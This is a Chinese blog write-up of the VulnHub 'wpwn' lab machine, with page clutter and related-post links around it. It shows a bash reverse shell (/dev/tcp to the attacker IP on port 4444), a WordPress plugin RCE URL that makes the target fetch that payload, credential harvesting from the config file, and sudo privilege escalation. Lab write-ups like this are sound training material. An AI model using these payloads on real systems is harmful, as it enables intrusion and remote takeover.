vulnhub:wpwn靶机

最新推荐文章于 2023-06-13 13:35:27 发布
最新推荐文章于 2023-06-13 13:35:27 发布
阅读量293 收藏
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/128619151
版权

kali:192.168.111.111

靶机:192.168.111.145

端口扫描

目录爆破

使用wpscan发现插件存在漏洞

漏洞利用

创建shell.txt

<pre>
system("bash -c 'exec bash -i &>/dev/tcp/192.168.111.111/4444 <&1'");
</pre>

使用python开启http服务

python3 -m http.server

访问目标获取反弹shell

http://192.168.111.145/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.111.111:8000/shell.txt

查看wordpress配置文件,发现数据库用户名和密码

使用该密码切换到takis用户,查看sudo -l

提权

以takis用户输入

sudo su

查看/root/root.txt

查看root历史命令

root@wpwn:~# history
history
    1  exit
    2  ls -la
    3  cd USB
    4  LS -LA
    5  ls -la
    6  cat root
    7  cat root
    8  cat root
    9  cat root
   10  cat root
   11  cat root
   12  cat root
   13  cd ..
   14  rm -rf USB
   15  cd ..
   16  cd usr/
   17  ls -la
   18  cd share
   19  cd ..
   20  cd games
   21  ls -la
   22  mkdir USB
   23  cd USB/
   24  touch root
   25  echo -n -as0dsa0d0s0a | md5sum
   26  nano root 
   27  id
   28  cd /root
   29  ls -al
   30  cat root.txt
   31  history

查看/usr/games/USB/root获取flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub wpwn: 1
箭雨镜屋
07-23 791
渗透思路:nmap扫描 ---- gobuster扫描网站目录 ---- wpscan扫描发现漏洞插件 ---- 利用wordpress插件Social Warfare的RCE漏洞getshell(无需登录)---- wordpress配置文件泄露明文密码,切换到用户takis ---- sudo su提权 ---- 查看.bash_history发现flag...
Vulnhub-Pwned
dahege666的博客
05-30 572
靶机IP:192.168.1.9 攻击机IP:192.168.1.7 1、扫描靶机开放端口及服务 2、访问80端口,没什么有用的信息 3、扫描一下目标的敏感信息有一个robots.txt, 4、访问nothing目录,有一个nothing.html,查看源码 也没有有用的信息 5、使用gobuster扫描目录,找到hidden_text 6、访问后有一个.dic字段文件 7、将文件下周下来,然后进行目录扫描,只有pwned.vuln是能访问的。 .
pwn靶机安装
qq_33899138的博客
02-06 460
https://github.com/giantbranch/pwn-env-init 下载ubuntu16.04 解压文件打开即可
wordpress靶机渗透
badminton_0的博客
08-06 645
访问靶机网页,是一个wordpress站点 使用awvs扫描发现弱口令密码 Dirb扫描网站目录phpmyadmin,wp-login.php 登陆admin,发现 flag1 在此网站目录下找到flag2 wpscan扫描用户,写入user.txt cewl生成字典 wpscan爆破 获得密码 使用wordpress 登录 得到flag4 flag3 登陆后台修改404页面写入脚本 蚁剑...
vulnhub-Jarbas-wp
yutianovo的博客
09-04 295
靶机描述 http://blog.yutian233.xyz/index.php/ If you want to keep your hacking studies, please try out this machine! Jarbas 1.0 – A tribute to a nostalgic Brazilian search engine in the end of 90’s. Objective: Get root shell! 下载 https://www.vulnhub.com/entr
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub-midnight-wp
yutianovo的博客
08-05 421
博客地址 http://blog.yutian233.xyz/ 靶机描述 Difficulty: Intermediate Important!: Before auditing this machine make sure you add the host "sunset-midnight" to your /etc/hosts file, otherwise it may not work as expected. It is recommended to run this machine in V
[渗透测试学习靶机07] vulnhub靶场 Prime 2
weixin_47112073的博客
10-27 1560
Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。
vulnhub BLOGGER: 1 WP
qq_37410729的博客
04-13 147
然后查看一下/etc/passwd 发现可能有james,ubuntu,vagrant这些用户,也没翻到与密码有关的信息,索性就用用户名做密码试试,竟然登录成功了vagrant。然后就可以在kali中用arp扫到靶机了,得到IP地址,然后进行端口扫描,又是开启了22和80,然后去web进行信息收集。只需要有个图片头就可以绕过力,上传shell,shell地址也会回显,然后蚁剑成功连接。扫到一些目录,点进去挨个翻一翻,最终翻到一个留言系统。大部分按钮都不好使,注册也不好用,扫一下目录。
vulnhub-dc3-渗透靶机-wp
yutianovo的博客
08-31 456
靶机描述 DESCRIPTION DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginners in mind, although this time around, there is o
【甄选靶场】Vulnhub百个项目渗透——项目三十二:DC-6(WP插件漏洞,跳板,二进制提权)
人间体佐菲的博客
10-05 719
【甄选靶场】Vulnhub百个项目渗透——项目三十二:DC-6(WP插件漏洞,跳板,二进制提权)
【甄选靶场】Vulnhub百个项目渗透——项目十五:Raven-1(wp利用,UDF提权)
人间体佐菲的博客
09-17 735
网络安全,渗透测试,信息安全
Vulnhub靶机实战-POTATO-WP
黑白的博客
01-18 688
声明 好好学习,天天向上 搭建 virtualbox打开,网络和攻击机一样,要么都用桥接要么都用NAT 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.66 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22,2122 访问80 http://192.168.31.66 扫描目录 python3 dirsearch.py -u 192.168.31.66 挨个试一试,发现 /admin需要密码 /admin/logs
vulnhub靶机pWnOS2.0
weixin_53665747的博客
06-13 150
偏简单,整体思路没有太难,利用过程也相对顺利。
本地wampserver如何配置伪静态
无名剑
08-02 2758
第一步:找到Apache安装目录下httpd.conf这个文件,搜索找到,“LoadModule rewrite_module modules/mod_rewrite.so”,找到这一行,去掉前面的“#”; 第二步:找到“AllowOverride None”改为“AllowOverride All”.; 第三步:重启apache 第四步:新建.haccess文件,放在当前网站根目录下,在.
vulnhub靶机系列:
最新发布
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值